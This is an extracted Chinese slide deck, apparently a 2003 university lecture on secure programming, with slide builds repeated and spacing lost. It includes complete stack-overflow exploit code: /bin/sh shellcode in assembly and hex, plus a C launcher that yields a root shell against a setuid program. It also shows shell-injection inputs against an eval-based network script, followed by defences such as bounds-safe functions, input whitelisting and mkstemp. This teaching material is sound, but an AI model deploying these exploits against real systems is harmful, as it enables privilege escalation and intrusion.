安全程序設(shè)計(jì)

網(wǎng)絡(luò)與信息安全

第十五講

安全程序設(shè)計(jì)

唐禮勇

北京大學(xué)信息科學(xué)技術(shù)學(xué)院

軟件研究所－信息安全研究室

tly@

2003年春季北京大學(xué)碩士研究生課程現(xiàn)實(shí)中的一些安全問(wèn)題現(xiàn)實(shí)中的一些安全問(wèn)題我的口令就是我的用戶名后加上123現(xiàn)實(shí)中的一些安全問(wèn)題我的口令就是我的用戶名后加上123我的口令是Q47pY!3，每隔90天就更換一次現(xiàn)實(shí)中的一些安全問(wèn)題強(qiáng)而有效的不可破解的加密技術(shù)隨處均可得

到（盡管有各種各樣的進(jìn)出口限制）不攻擊加密技術(shù)，攻擊其應(yīng)用的底層基礎(chǔ)設(shè)施不攻擊加密技術(shù)，攻擊其實(shí)現(xiàn)不攻擊加密技術(shù)，而從用戶方面入手WhySecurityisHarderthanitLooks所有軟件都是有錯(cuò)的通常情況下99.99%無(wú)錯(cuò)的程序很少會(huì)出問(wèn)題同安全相關(guān)的99.99%無(wú)錯(cuò)的程序可以確信會(huì)被人利用那0.01%的錯(cuò)誤0.01%安全問(wèn)題等于100%的失敗從幾個(gè)程序談起B(yǎng)urningyourselfwithmaliciousdataSegmentationFault(coredumped)程序運(yùn)行平臺(tái)RedhatLinux8.0Kernel2.4.18GNUgcc3.2第一個(gè)程序#include<stdio.h>#include<string.h>voidSayHello(char*name){chartmpName[80];strcpy(tmpName,name);/*DosomechecksfortmpName.*/printf("Hello%s\n",tmpName);}intmain(intargc,char**argv){if(argc!=2){printf("Usage:hello<name>.\n");return1;}SayHello(argv[1]);return0;}

hello.c運(yùn)行情況$./hellocomputerHellocomputer

hello.c運(yùn)行情況$./hellocomputerHellocomputer$./helloaaaa………….aHelloaaaa……………….aSegmentationfault(coredumped)

hello.c運(yùn)行情況$./hellocomputerHellocomputer$./helloaaaa………….aHelloaaaa……………….aSegmentationfault(coredumped)

hello.cWhy????檢查一下程序#include<stdio.h>#include<string.h>voidSayHello(char*name){

chartmpName[80];

strcpy(tmpName,name);/*DosomechecksfortmpName.*/printf("Hello%s\n",tmpName);}intmain(intargc,char**argv){if(argc!=2){printf("Usage:hello<name>.\n");return1;}SayHello(argv[1]);return0;}

hello.c進(jìn)一步思考……發(fā)生了什么事？幾個(gè)要點(diǎn)Linux及其它幾乎所有Intelx86系統(tǒng)、Solaris,etc分頁(yè)式存儲(chǔ)管理平面內(nèi)存結(jié)構(gòu)，4GB或更大邏輯地址空間棧從下往上生長(zhǎng)C語(yǔ)言不進(jìn)行邊界檢查進(jìn)程內(nèi)存布局代碼區(qū)數(shù)據(jù)區(qū)堆棧段字符串向下生長(zhǎng)棧段向上生長(zhǎng)0x000000000xFFFFFFFF調(diào)用SayHello之前的棧main函數(shù)局部變量區(qū)lastfpretipargcargvenv…...ESPmain棧幀進(jìn)入SayHello后的棧tmpName[80]main-fpretipnamemain棧幀…...ESPSayHello棧幀準(zhǔn)備退出SayHello的棧(情況1)computer.

…………..main-fpretipnamemain棧幀…...ESPSayHello棧幀main中return0;./hellocomputer準(zhǔn)備退出SayHello的棧(情況2)aaaaaaaaaaaaaaaaaa……aaaaaaaa0x616161610x616161610x61616161main棧幀…...ESPSayHello棧幀retip???????./helloaaaaaa……………….a如果精心選擇數(shù)據(jù)……...如果精心選擇數(shù)據(jù)……...ESPSayHello棧幀retip如果精心選擇數(shù)據(jù)……...???????????????????………..????0x????????0xNNNNNNNN0x????????………...………...………...ESPSayHello棧幀retip0xNNNNNNNN如果精心選擇數(shù)據(jù)……...???????????????????………..????0x????????0xNNNNNNNN0x????????………...………...Our-CodesESPSayHello棧幀retip0xNNNNNNNN如何選擇這些數(shù)據(jù)？幾個(gè)問(wèn)題：SayHello函數(shù)局部變量區(qū)大?。咳绾芜x擇這些數(shù)據(jù)？幾個(gè)問(wèn)題：SayHello函數(shù)局部變量區(qū)大??？NNNNNNNN如何確定？如何選擇這些數(shù)據(jù)？幾個(gè)問(wèn)題：SayHello函數(shù)局部變量區(qū)大??？NNNNNNNN如何確定？Ourcodes該怎樣寫如何選擇這些數(shù)據(jù)？幾個(gè)問(wèn)題：SayHello函數(shù)局部變量區(qū)大?。縉NNNNNNN如何確定？Ourcodes該怎樣寫輸入緩沖區(qū)不能包含0局部變量區(qū)問(wèn)題???????????????????………..????0x????????0xNNNNNNNN0x????????………...………...Our-CodesESPSayHello棧幀retip0xNNNNNNNN局部變量區(qū)問(wèn)題0xNNNNNNNN………..NNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNNOur-CodesESPSayHello棧幀retip0xNNNNNNNN代碼起始地址如何確定？0xNNNNNNNN………..NNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNNOur-CodesESPSayHello棧幀retip0xNNNNNNNN<4K代碼起始地址如何確定問(wèn)題已轉(zhuǎn)化為用ESP加上某一偏移代碼起始地址如何確定問(wèn)題已轉(zhuǎn)化為用ESP加上某一偏移該偏移不需要精確為什么偏移不需要精確？0xNNNNNNNN………..NNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN……….NNNNNNOPNOP……..NOPReal-CodesESPSayHello棧幀retip0xNNNNNNNN代碼起始地址如何確定問(wèn)題已轉(zhuǎn)化為用ESP加上某一偏移該偏移不需要精確ESP如何確定呢代碼起始地址如何確定問(wèn)題已轉(zhuǎn)化為用ESP加上某一偏移該偏移不需要精確ESP如何確定呢用同樣選項(xiàng)，插入一段代碼，重新編譯代碼起始地址如何確定問(wèn)題已轉(zhuǎn)化為用ESP加上某一偏移該偏移不需要精確ESP如何確定呢用同樣選項(xiàng)，插入一段代碼，重新編譯使用調(diào)試工具跟蹤應(yīng)用程序代碼起始地址如何確定問(wèn)題已轉(zhuǎn)化為用ESP加上某一偏移該偏移不需要精確ESP如何確定呢用同樣選項(xiàng)，插入一段代碼，重新編譯使用調(diào)試工具跟蹤應(yīng)用程序編一小程序，打印出運(yùn)行時(shí)棧頂位置代碼起始地址如何確定問(wèn)題已轉(zhuǎn)化為用ESP加上某一偏移該偏移不需要精確ESP如何確定呢用同樣選項(xiàng)，插入一段代碼，重新編譯使用調(diào)試工具跟蹤應(yīng)用程序編一小程序，打印出運(yùn)行時(shí)棧頂位置在同樣環(huán)境下，不同進(jìn)程之間棧位置距離不會(huì)太遠(yuǎn)植入代碼如何編寫植入代碼如何編寫 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0植入代碼如何編寫

jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0植入代碼如何編寫 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0植入代碼如何編寫 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0

esi==cmd植入代碼如何編寫 jmp label2label1: pop esi

mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0

esi==cmd植入代碼如何編寫 jmp label2label1: pop esi

mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd

esi==cmd植入代碼如何編寫 jmp label2label1: pop esi mov [esi+8],esi

xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd

esi==cmd植入代碼如何編寫 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al

mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd

esi==cmd植入代碼如何編寫 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al

mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd,0

esi==cmd植入代碼如何編寫 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax

mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd,0

esi==cmd運(yùn)行程序路徑命令行參數(shù)execp系統(tǒng)調(diào)用植入代碼如何編寫 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h

xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd,0

esi==cmd_exit植入代碼二進(jìn)制格式charshell_code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0”“\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c”“\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";植入代碼自測(cè)試程序(1)#include<string.h>unsignedcharshell_code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0”“\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c”“\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/ls";charlarge_string[128];main(){charbuffer[96];inti;

test1.c植入代碼自測(cè)試程序(2)long*long_ptr=(long*)large_string;for(i=0;i<32;i++)long_ptr[i]=(long)buffer;for(i=0;i<strlen(shell_code);i++)large_string[i]=shell_code[i];strcpy(buffer,large_string);printf("IseverythingOK?:-)\n");}

test1.c植入代碼自測(cè)試程序(3)$./test1IseverythingOK?:-)

test1.c植入代碼自測(cè)試程序(3)$./test1IseverythingOK?:-)hellohello.ctest1test1.c

test1.c完整的攻擊hello的程序(1)#include<string.h>#include<stdlib.h>#include<unistd.h>unsignedcharshell_code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0”“\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c”“\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";#defineDEFAULT_OFFSET0#defineBUFFER_SIZE1024test2.c完整的攻擊hello的程序(2)unsignedlongget_esp(){__asm__("movl%esp,%eax");}main(intargc,char**argv){char*buff;char*ptr;unsignedlong*addr_ptr;unsignedlongesp;inti,ofs;test2.c完整的攻擊hello的程序(3)if(argc==1)ofs=DEFAULT_OFFSET;elseofs=atoi(argv[1]);ptr=buff=malloc(4096);/*Fillinwithaddresses*/addr_ptr=(unsignedlong*)ptr;esp=get_esp();printf("ESP=%08x\n",esp);

for(i=0;i<100;i++)*(addr_ptr++)=esp+ofs;test2.c完整的攻擊hello的程序(4)/*FillthestartofshellbufferwithNOPs*/ptr=(char*)addr_ptr;

memset(ptr,'A',BUFFER_SIZE-strlen(shell_code));ptr+=BUFFER_SIZE-strlen(shell_code);/*Andthentheshellcode*/memcpy(ptr,shell_code,strlen(shell_code));ptr+=strlen(shell_code);*ptr=0;printf("IseverythingOK?:-)\n");execl("./hello","hello",buff,NULL);}test2.c完整的攻擊hello的程序(4)/*FillthestartofshellbufferwithNOPs*/ptr=(char*)addr_ptr;memset(ptr,'A',BUFFER_SIZE-strlen(shell_code));ptr+=BUFFER_SIZE-strlen(shell_code);/*Andthentheshellcode*/

memcpy(ptr,shell_code,strlen(shell_code));ptr+=strlen(shell_code);*ptr=0;printf("IseverythingOK?:-)\n");execl("./hello","hello",buff,NULL);}test2.c完整的攻擊hello的程序(4)/*FillthestartofshellbufferwithNOPs*/ptr=(char*)addr_ptr;memset(ptr,'A',BUFFER_SIZE-strlen(shell_code));ptr+=BUFFER_SIZE-strlen(shell_code);/*Andthentheshellcode*/memcpy(ptr,shell_code,strlen(shell_code));ptr+=strlen(shell_code);*ptr=0;printf("IseverythingOK?:-)\n");

execl("./hello","hello",buff,NULL);}test2.c完整的攻擊hello的程序(5)<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆亂碼>/bin/shtest2.c完整的攻擊hello的程序(5)<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆亂碼>/bin/shbash$_test2.c完整的攻擊hello的程序(5)<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆亂碼>/bin/shbash$_test2.c完整的攻擊hello的程序(5)<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆亂碼>/bin/shbash$bash$whoamitlybash$_test2.c得出的結(jié)論一個(gè)程序當(dāng)沒(méi)有很好地檢查邊界條件時(shí)可能會(huì)受到緩沖區(qū)溢出攻擊。有緩沖區(qū)溢出漏洞的程序當(dāng)它能以特權(quán)用戶身份運(yùn)行時(shí)，可能讓普通用戶無(wú)需經(jīng)過(guò)認(rèn)證就可以獲得系統(tǒng)特權(quán)。rootexploitRemoterootexploit通過(guò)網(wǎng)絡(luò)，不需認(rèn)證即可獲得root權(quán)限Localrootexploit本地普通用戶，利用系統(tǒng)程序的漏洞獲得root權(quán)限哪些程序?qū)⒁蕴貦?quán)用戶身份運(yùn)行網(wǎng)絡(luò)服務(wù)程序HTTPServer、FTPServer、MailServer,etcsyslogTrojian木馬程序suid/sgid程序suid/sgid程序Unix一項(xiàng)特殊技術(shù)，使普通用戶也能做只有超級(jí)用戶才能執(zhí)行的任務(wù)passwd、at、crontab、ping普通rwx之上加上s位，kernel在載入進(jìn)程映象時(shí)自動(dòng)將進(jìn)程有效用戶/組標(biāo)識(shí)置為映象文件文件屬主/組例：ls-l/usr/bin/passwd-r-s--x--x1root/usr/bin/passwd還是攻擊hello的例子<tly:~/tttt/tt>$subash#chownroot:roothellobash#chmodu+shello;exit<tly:~/tttt/tt>$_還是攻擊hello的例子<tly:~/tttt/tt>$subash#chownroot:roothellobash#chmodu+shello;exit<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆亂碼>/bin/sh還是攻擊hello的例子<tly:~/tttt/tt>$subash#chownroot:roothellobash#chmodu+shello;exit<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆亂碼>/bin/shbash#_還是攻擊hello的例子<tly:~/tttt/tt>$subash#chownroot:roothellobash#chmodu+shello;exit<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆亂碼>/bin/shbash#bash#whoamirootbash#_近幾年出現(xiàn)過(guò)的bufferoverflows

splitvt,syslog,mount/umount,sendmail,lpr,bind,gethostbyname(),modstat,cron,login,sendmailagain,thequeryCGIscript,newgrp,AutoSoftsRTSinventorycontrolsystem,host,talkd,getopt(),sendmailyetagain,FreeBSD’scrt0.c,WebSite1.1,rlogin,term,ffbconfig,libX11,passwd/yppasswd/nispasswd,imapd,ipop3d,SuperProbe,lpd,xterm,eject,lpdagain,host,mount,theNLSlibrary,xlock,libXtandfurtherX11R6libraries,talkd,fdformat,eject,elm,cxterm,ps,fbconfig,metamail,dtterm,df,anentirerangeofSGIprograms,psagain,chkey,libX11,suidperl,libXtagain,lquerylv,getopt()again,dtaction,at,libDtSvc,eeprom,lpryetagain,smbmount,xlockyetagain,MH-6.83,NIS+,ordist,xlockagain,psagain,bash,rdist,login/scheme,libX11again,sendmailforWindowsNT,wm,wwwcount,tgetent(),xdat,termcap,portmir,writesrv,rcp,opengroup,telnetd,rlogin,MSIE,eject,df,statd,atagain,rloginagain,rsh,ping,traceroute,Cisco7xxrouters,xscreensaver,passwd,deliver,cidentd,Xserver,theYappconferencingserver,multipleproblemsintheWindows95/NTNTFTPclient,theWindowsWarandServ-UFTPdaemon,theLinuxdynamiclinker,filter(partofelm-2.4),theIMailPOP3serverforNT,pset,rpc.nisd,Sambaserver,ufsrestore,DCEsecd,pine,dslip,RealPlayer,SLMail,socks5,CSMProxy,imapd(again),OutlookExpress,NetscapeMail,mutt,MSIE,LotusNotes,MSIEagain,libauth,login,iwsh,permissions,unfsd,Minicom,nslookup,zpop,dig,WebCam32,smbclient,compress,elvis,lha,bash,jidentd,Tooltalk,ttdbserver,dbadmin,zgv,mountd,pcnfs,NovellGroupwise,mscreen,xterm,Xawlibrary,CiscoIOS,muttagain,ospf_monitor,sdtcm_convert,Netscape(allversions),mpg123,Xprt,klogd,catdoc,junkbuster,SerialPOP,andrdist,……………….怎么解決？更為小心的程序設(shè)計(jì)將安全相關(guān)的功能隔離到仔細(xì)檢查的代碼內(nèi)怎么解決？更為小心的程序設(shè)計(jì)將安全相關(guān)的功能隔離到仔細(xì)檢查的代碼內(nèi)讓棧不可運(yùn)行會(huì)導(dǎo)致若干技術(shù)難題怎么解決？更為小心的程序設(shè)計(jì)將安全相關(guān)的功能隔離到仔細(xì)檢查的代碼內(nèi)讓棧不可運(yùn)行會(huì)導(dǎo)致若干技術(shù)難題基于編譯器的方法在代碼內(nèi)自動(dòng)增加邊界檢查（veryslow）運(yùn)行過(guò)程中進(jìn)行棧完整性檢查（slightslowdown）VisualStudio.Net:cl/GSImmunix:StackGuard重新排列棧變量（noslowdown）程序失敗的其它例子程序失敗的其它例子傳遞參數(shù)到其它進(jìn)程程序失敗的其它例子傳遞參數(shù)到其它進(jìn)程其它類型輸入程序失敗的其它例子傳遞參數(shù)到其它進(jìn)程其它類型輸入

Racecondition程序失敗的其它例子傳遞參數(shù)到其它進(jìn)程其它類型輸入

Racecondition

會(huì)話密鑰的生成程序失敗的其它例子傳遞參數(shù)到其它進(jìn)程其它類型輸入

Racecondition

會(huì)話密鑰的生成內(nèi)存數(shù)據(jù)保護(hù)程序失敗的其它例子傳遞參數(shù)到其它進(jìn)程其它類型輸入

Racecondition

會(huì)話密鑰的生成內(nèi)存數(shù)據(jù)保護(hù)

最小特權(quán)傳參數(shù)給其它進(jìn)程的幾種類型傳參數(shù)給其它進(jìn)程的幾種類型Unixshellscripts傳參數(shù)給其它進(jìn)程的幾種類型UnixshellscriptsCGI/Perlscripts傳參數(shù)給其它進(jìn)程的幾種類型UnixshellscriptsCGI/Perlscripts很復(fù)雜的應(yīng)用sendmail傳參數(shù)給其它進(jìn)程的幾種類型UnixshellscriptsCGI/Perlscripts很復(fù)雜的應(yīng)用sendmail其它類型TCPWrapperinetd又一個(gè)有問(wèn)題的程序#!/bin/shecho"What'syourname?"readnameevalechoHello$nameechoNicetomeetyou!echoGoodbye!hellod運(yùn)行情況$./hellodWhat’syournameMickyHelloMickyNicetomeetyouGoodbyehellod運(yùn)行情況(續(xù))$./hellodWhat’syournameMicky；ls;HelloMickyhellod運(yùn)行情況(續(xù))$./hellodWhat’syournameMicky；ls;HelloMickycsis-overflow.tar.gzhellohello.chellodtest1test1.ctest2test2.cNicetomeetyou!Goodbye!hellod運(yùn)行情況(續(xù))$./hellodWhat’syournameMicky；ls;HelloMickycsis-overflow.tar.gzhellohello.chellodtest1test1.ctest2test2.cNicetomeetyou!Goodbye!hellod問(wèn)題何在？#!/bin/shecho"What'syourname?"readnameevalechoHello$nameechoNicetomeetyou!echoGoodbye!hellod假如此程序上網(wǎng)$ln-s`pwd`/hellod/usr/sbin$vi/etc/inetd.conf增加下面一行：2000streamtcpnowaitroot/usr/sbin/tcpdhellod$su#killall-HUPinetd/etc/inetd.conf正常情況下的結(jié)果$telnetlocalhost2000Trying...Connectedtolocalhost.Escapecharacteris'^]'.What'syourname?MickyHelloMickyNicetomeetyou!Goodbye!Connectionclosedbyforeignhost.網(wǎng)絡(luò)上的hellod再來(lái)?yè)v搗亂$telnetlocalhost2000Trying...Connectedtolocalhost.Escapecharacteris'^]'.What'syourname?Micky;whoami;HelloMicky網(wǎng)絡(luò)上的hellod再來(lái)?yè)v搗亂$telnetlocalhost2000Trying...Connectedtolocalhost.Escapecharacteris'^]'.What'syourname?Micky;whoami;HelloMickyroot:commandnotfoundNicetomeetyou!Goodbye!Connectionclosedbyforeignhost.網(wǎng)絡(luò)上的hellod再來(lái)?yè)v搗亂$telnetlocalhost2000Trying...Connectedtolocalhost.Escapecharacteris'^]'.What'syourname?Micky;whoami;HelloMickyroot:commandnotfoundNicetomeetyou!Goodbye!Connectionclosedbyforeignhost.網(wǎng)絡(luò)上的hellod也是輸入（DNS）早期的TCPWrapperhosts.deny@%h:替換為client機(jī)器名或IP（反向解析失敗時(shí)）問(wèn)題：當(dāng)0被解析為>/etc/passwd時(shí)，會(huì)發(fā)生什么？ALL:.bad.domain:finger-l@%h|/usr/ucb/mailroot其它類型輸入其它類型輸入IIS3.0以前GET../../其它類型輸入IIS3.0以前GET../../Windows奇怪的目錄名解析C:\TEMP\t1\t2\t3\t4\t5\t6>cd…….C:\TEMP>_其它類型輸入(續(xù)一)子進(jìn)程從父進(jìn)程繼承的內(nèi)容進(jìn)程身份uid、gid、euid、egid可能被跟蹤、發(fā)信號(hào)改變其運(yùn)行狀態(tài)打開(kāi)文件描述符環(huán)境變量IFS、LD_PRELOAD文件創(chuàng)建模式掩碼其它類型輸入(續(xù)二)子進(jìn)程從父進(jìn)程繼承的內(nèi)容(續(xù))當(dāng)前目錄和根目錄資源極限調(diào)度優(yōu)先級(jí)可能被用于下面將要談到的racecondition攻擊內(nèi)部時(shí)鐘信號(hào)處理處理函數(shù)被重置但被阻塞信號(hào)仍被阻塞，被忽略信號(hào)仍被忽略如何正確處理輸入如何正確處理輸入原則：不要相信任何來(lái)自不可靠信息源的消息。如何正確處理輸入原則：不要相信任何來(lái)自不可靠信息源的消息。字符串操作類函數(shù)不要使用strcpy、strcat、sprintf換用strncpy、strncat、snprintf不要使用gets、scanf換用read、fgets小心getenv，可能被用于緩沖區(qū)溢出如何正確處理輸入(續(xù)一)字符串操作類函數(shù)(續(xù))小心gethostbyname、gethostbyaddr某些DNS可能返回惡意地址如果可能，應(yīng)該做雙向查詢?nèi)绾握_處理輸入(續(xù)一)字符串操作類函數(shù)(續(xù))小心gethostbyname、gethostbyaddr某些DNS可能返回惡意地址如果可能，應(yīng)該做雙向查詢運(yùn)行新進(jìn)程system、popen、exec將產(chǎn)生新shell，可能做系統(tǒng)不希望它做的事?lián)Q用execl或execv，對(duì)傳遞數(shù)據(jù)作嚴(yán)格一致性檢查(sanitycheck)CreateProcess(NULL,"C:\ProgramFiles\foo",...)如何正確處理輸入(續(xù)二)命令行檢查程序中應(yīng)仔細(xì)檢查每一參數(shù)尤其是以很高特權(quán)運(yùn)行的程序如何正確處理輸入(續(xù)二)命令行檢查程序中應(yīng)仔細(xì)檢查每一參數(shù)尤其是以很高特權(quán)運(yùn)行的程序數(shù)據(jù)檢查正確的方法：只允許可以確信沒(méi)有問(wèn)題的數(shù)據(jù)通過(guò)，如字母、數(shù)字、點(diǎn)及一些符號(hào)錯(cuò)誤的方法：除已知會(huì)出問(wèn)題的數(shù)據(jù)外都允許通過(guò)?？赡軙?huì)有漏網(wǎng)之魚(yú)。例：隨早期Apachewebserver的php.cgi就忘了過(guò)濾回車符RaceCondition多任務(wù)環(huán)境下，利用進(jìn)程運(yùn)行的異步性，搶占或改變進(jìn)程使用資源判斷資源性質(zhì)與真正使用該資源之間有一個(gè)時(shí)間差，在這段時(shí)間內(nèi)進(jìn)程很可能運(yùn)行完時(shí)間片被調(diào)度出去，此時(shí)其它進(jìn)程可能改變?cè)撡Y源性質(zhì)。RaceCondition例目的：創(chuàng)建并打開(kāi)臨時(shí)文件保證只有當(dāng)前進(jìn)程能打開(kāi)該文件方案一#defineTMP_FILE“/tmp/_file”sprintf(tmpFile,“%s%05d.dat”,TMP_FILE,getpid());fd=open(tmpFile,O_RDWR|O_CREAT|O_TRUNC,0600);存在的問(wèn)題：1.若tmpFile已存在，怎么辦？2.若tmpFile為一符號(hào)鏈接，怎么辦？方案一#defineTMP_FILE“/tmp/_file”sprintf(tmpFile,“%s%05d.dat”,TMP_FILE,getpid());fd=open(tmpFile,O_RDWR|O_CREAT|O_EXCL|O_TRUNC,0600);方案二chartmpTemplate[]=“/tmp/_fileXXXXXX”tmpFile=mktemp(tmpTemplate);if(!tmpFile){Error(“Error”);exit(-1);}fd=open(tmpFile,O_RDWR|O_CREAT|O_EXCL|O_TRUNC,0600);方案二

chartmpTemplate[]=“/tmp/_fileXXXXXX”tmpFile=mktemp(tmpTemplate);if(!tmpFile){Error(“Error”);exit(-1);}fd=open(tmpFile,O_RDWR|O_CREAT|O_EXCL|O_TRUNC,0600);需要加一循環(huán)方案三chartmpTemplate[]=“/tmp/_fileXXXXXX”fd=mkstemp(tmpTemplate);if(fd<0){Error(“Error”);exit(-1);}會(huì)話密鑰的生成生成會(huì)話密鑰需要大量不可預(yù)測(cè)的隨機(jī)數(shù)在PC上生成隨機(jī)數(shù)非常困難大多數(shù)人的動(dòng)作行為是不可預(yù)測(cè)的用戶輸入可能是不可預(yù)測(cè)的，但對(duì)獨(dú)立服務(wù)器來(lái)說(shuō)很難利用。會(huì)話密鑰的生成生成會(huì)話密鑰需要大量不可預(yù)測(cè)的隨機(jī)數(shù)在PC上生成隨機(jī)數(shù)非常困難大多數(shù)人的動(dòng)作行為是不可預(yù)測(cè)的用戶輸入可能是不可預(yù)測(cè)的，但對(duì)獨(dú)立服務(wù)器來(lái)說(shuō)很難利用。通常情況下實(shí)現(xiàn)由應(yīng)用開(kāi)發(fā)者處理但開(kāi)發(fā)者的實(shí)現(xiàn)大多有誤一些有問(wèn)題的隨機(jī)數(shù)生成器Netscape(原)a=mixbits(time.tv_usec);b=mixbits(getpid()+time.tv_sec+(getppid()<<12);seed=MD5(a,b);nonce=MD5(seed++);key=MD5(seed++);一些有問(wèn)題的隨機(jī)數(shù)生成器(續(xù))KerberosV4srandom(time.tv_usec^time.tv_sec^getpid()